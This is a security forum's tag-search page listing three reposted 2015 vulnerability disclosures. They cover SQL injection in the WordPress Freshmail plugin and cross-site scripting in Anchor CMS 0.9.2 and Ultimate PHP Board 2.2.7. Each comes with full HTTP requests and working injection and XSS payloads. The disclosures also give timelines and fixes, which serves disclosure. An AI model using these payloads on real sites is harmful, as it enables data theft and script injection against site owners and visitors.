Jump to content

Search the Community

Showing results for tags 'content-disposition'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 3 results

  1. ------------------------ ISSUE 1: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> * # Software Link: *https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip <https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>* # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection in located in the attribute "id" of the inserted shortcode [FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query. A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection. 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/shortcode.php, lines 27 and 120: Line 19: function fm_form_func($atts) [...] Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";'); [...] Line 120: add_shortcode('FM_form', 'fm_form_func'); 3. Proof of concept --------------------------- 1. As collaborator, start a new post. 2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b'] 3. Click preview. 4. If the form is shown, the statement is true, if not, false. POST /wp-admin/post.php HTTP/1.1 Host: <web> Content-Length: 3979 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: <web> User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_f305[...] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wpnonce" 0a75a3666b ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="user_ID" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="action" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="originalaction" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_author" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_type" post ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_post_status" pending ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="referredby" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_original_http_referer" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_ID" 69 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="meta-box-order-nonce" f8aa04e508 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="closedpostboxesnonce" ebf65a43ed ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_title" Testing SQLi in shortcode ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="samplepermalinknonce" e753a2d8f2 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="content" [FM_form id='1" and substr(user(),1,1)="b] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="wp-preview" dopreview ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_publish" Submit for Review ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_format" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="tax_input[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="newtag[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="excerpt" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="trackback_url" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyselect" #NONE# ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyinput" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metavalue" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_ajax_nonce-add-meta" 6a13a5a808 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="advanced_view" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="comment_status" open ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="ping_status" open ------WebKitFormBoundary384PE6lRgBcOibkL-- 5. Solution --------------- Update to version 1.6 ------------------------ ISSUE 2: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> # Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter *fm_form_id. * 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 [...] Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func'); [...] Line 44: $result =3D $_POST; [...] Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id=3D"'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept --------------------------- POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <web> X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and "a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id=3D"1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a". 5. Solution --------------- Update to version 1.6 Source
  2. #Affected Vendor: http://anchorcms.com/ #Date: 23/03/2015 #Discovered by: JoeV #Type of vulnerability: XSS #Tested on: Windows 7 #Version: 0.9.2 #Description: Anchor CMS v 0.9.2 is susceptible to Cross Site Scripting attack. Proof of Concept (PoC): --------------------------- *XSS* --- POST /anchor/index.php/admin/pages/add HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 1003 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4w4M5e7r1tBwc2wp Referer: http://localhost/anchor/index.php/admin/pages/add Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: anchor-install-timezone=-330; anchorcms-install=kIlKh79lcE6sWxZBwoSMI2eN4LuqpHgK; anchorcms-install_payload=ZDYyYjliOTEyMzhlNjJjYmVjZTg0ZmFkNmMxMGRlMDRhOjM6e3M6NDoiX291dCI7YTowOnt9czozOiJfaW4iO2E6MDp7fXM6ODoiaHRhY2Nlc3MiO3M6Mzg4OiJPcHRpb25zIC1pbmRleGVzCgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KCVJld3JpdGVFbmdpbmUgT24KCVJld3JpdGVCYXNlIC9hbmNob3IKCgkjIEFsbG93IGFueSBmaWxlcyBvciBkaXJlY3RvcmllcyB0aGF0IGV4aXN0IHRvIGJlIGRpc3BsYXllZCBkaXJlY3RseQoJUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKCVJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kCgoJIyBSZXdyaXRlIGFsbCBvdGhlciBVUkxzIHRvIGluZGV4LnBocC9VUkwKCVJld3JpdGVSdWxlIF4oLiopJCBpbmRleC5waHAvJDEgW0xdCjwvSWZNb2R1bGU%2BCgo8SWZNb2R1bGUgIW1vZF9yZXdyaXRlLmM%2BCglFcnJvckRvY3VtZW50IDQwNCBpbmRleC5waHAKPC9JZk1vZHVsZT4KIjt9; anchorcms=u8h0s9Vjh9LUAM56y7TDWBFolw8tJxxC ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="token" 286db1269c0e304c7e435bf10251f950 ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="title" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="redirect" ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="content" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="name" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="slug" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="status" published ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="parent" 1 ------WebKitFormBoundary4w4M5e7r1tBwc2wp-- -- Regards, *Joel V* Source
  3. Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Ultimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability. # Exploit Title : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability # CVE : CVE-2015-2217 # Date : 4 March 2015 # Exploit Author : CWH Underground # Discovered By : ZeQ3uL # Site : www.2600.in.th # Vendor Homepage : http://www.myupb.com # Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip # Version : 2.2.7 ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' #################### SOFTWARE DESCRIPTION #################### Ultimate PHP Board is completely text based making it easy for anybody who has access to PHP can run a message board of their own without the need for MySQL. #################################### DESCRIPTION FOR CROSS SITE SCRIPTING #################################### myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. myUPB 2.2.7 is vulnerable; other versions may also be affected. #################### VULNERABILITY DETAIL #################### 1. Reflect Cross Site Scripting (search.php) POC: /search.php?q='><script>alert(1)</script> 2. Stored Cross Site Scripting (profile.php) POC: POST /upb/profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/upb/profile.php Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------287611866431947 Content-Length: 716 -----------------------------287611866431947 Content-Disposition: form-data; name="u_email" t@t.com -----------------------------287611866431947 Content-Disposition: form-data; name="u_loca" th -----------------------------287611866431947 Content-Disposition: form-data; name="avatar" images/avatars/chic.jpg'><script>alert("hacked");</script> -----------------------------287611866431947 Content-Disposition: form-data; name="u_site" http:// -----------------------------287611866431947 Content-Disposition: form-data; name="u_timezone" 0 -----------------------------287611866431947 Content-Disposition: form-data; name="u_edit" Submit -----------------------------287611866431947-- ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ Source
×
×
  • Create New...